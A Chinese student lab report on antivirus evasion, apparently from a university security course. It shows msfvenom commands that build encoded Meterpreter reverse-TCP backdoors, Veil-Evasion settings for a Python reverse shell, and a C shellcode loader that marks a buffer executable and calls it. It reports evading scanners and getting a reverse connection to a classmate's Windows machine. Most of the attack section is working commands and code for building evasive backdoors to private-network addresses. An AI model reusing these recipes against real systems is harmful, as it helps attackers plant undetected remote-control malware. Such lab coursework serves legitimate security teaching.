20155205 郝博雅 Exp3 免殺原理與實踐

20155205 郝博雅 Exp3 免殺原理與實踐

1、基礎問題回答

（1）殺軟是如何檢測出惡意代碼的？

• 答：++基於特徵碼的檢測++<簡單來講一段特徵碼就是一段或多段數據。若是一個可執行文件（或其餘運行的庫、腳本等）包含這樣的數據則被認爲是惡意代碼>。++啓發式惡意軟件檢測++，就是根據些片面特徵去推斷。++基於行爲的惡意軟件檢測++，這個也很容易理解，就是根據程序有什麼行爲來判斷他是好是壞。

（2）免殺是作什麼？

• 答：木馬或惡意程序、軟件避免被殺毒軟件或管理員發現並刪除。

（3）免殺的基本方法有哪些？

• 答：一、修改特徵碼。二、加殼<能夠用一些比較生僻的殼對木馬文件進行保護，阻止外部程序或軟件對加殼程序的反彙編分析或者動態分析>。三、假裝，防止被行爲查殺。

2、實驗內容

1.使用msf生成後門程序的檢測

• 將上次實驗生成的後門程序放到virscan上

• 咦？爲啥說有廣告，只能改個名啦

• 咱們能夠看到掃描的結果：

• 利用msfvenom對後門進行編碼處理，好比10次

msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -i 10 -b ‘\x00’ LHOST=192.168.206.132 LPORT=5205 -f exe > 5205-encode10.exe

• 會不會好一點呢？咱們來看一下

• 這說明編譯的次數是不會改變他被殺的事實的。。。
• 把他傳到windows裏直接被查殺。

2.使用veil-evasion生成後門程序的檢測

• 進入veil

• 輸入下面的指令設置veil

use evasion
use python/meterpreter/rev_tcp.py
set LHOST 192.168.206.132
set LPORT 5205

• 輸入generate生成payload，名字設爲payload5205.

• 使用老師給的方法會出錯，沒法生成後門文件，在veil中使用list查看能夠use啥，看到了這個7，咱們從新作一遍上面的設置。

• 從新的步驟爲：

use evasion
use 7
set LHOST 192.168.206.132
set LPORT 5205

• 能夠看到成功啦

• 找到他，而後放到virscan上掃描一下，發現比msf編譯過的強多了！

• 傳到windows裏後double kill

3.利用shellcode編寫後門程序的檢測

• 使用msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.137.132 LPORT=443 -f c生成shellcode

• 將上述數組加上主函數生成5205.c文件，以後用命令i686-w64-mingw32-g++ 5205.c -o 5205.exe將.c文件轉換爲可執行文件5205.exe

• 掃描一下下發現竟然不如veil生成的。。。

• 傳到Windows下，平常被殺。。。

4.Linux平臺交叉編譯Windows應用

#include "stdafx.h"
#include <windows.h>
#include <winbase.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

//192.168.6.129 443 reverse_tcp
const char met[] =
"\xfc\xe8\x82\x00\x00\x00\x60\x89\xe5\x31\xc0\x64\x8b\x50\x30"
"此處省去若干行"
"\x53\xff\xd5";

int main()
{
    DWORD old = 0;
    BOOL ret = VirtualProtect((LPVOID)met, strlen(met), PAGE_EXECUTE_READWRITE, &old);
    INT32 * addr;
    addr =(INT32*) &met;

    __asm;
    {
        call addr;
    }
    return 0;
}

5.實現免殺後回連

• 輸入下面的指令生成後門，攻擊20155218徐志瀚同窗的windows

msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai x86/bloxer -i 10 LHOST=192.168.206.132 LPORT=5205 -f c

• 能夠實現回連，成功窺探他的小祕密

3、實驗體會

• 沒有想到本身的電腦是這麼這麼的弱，並且發現攻擊安全意識不強的人的電腦十分容易！雖然作實驗的時候電腦卡的不要不要的，成功改了程序免殺仍是很開心。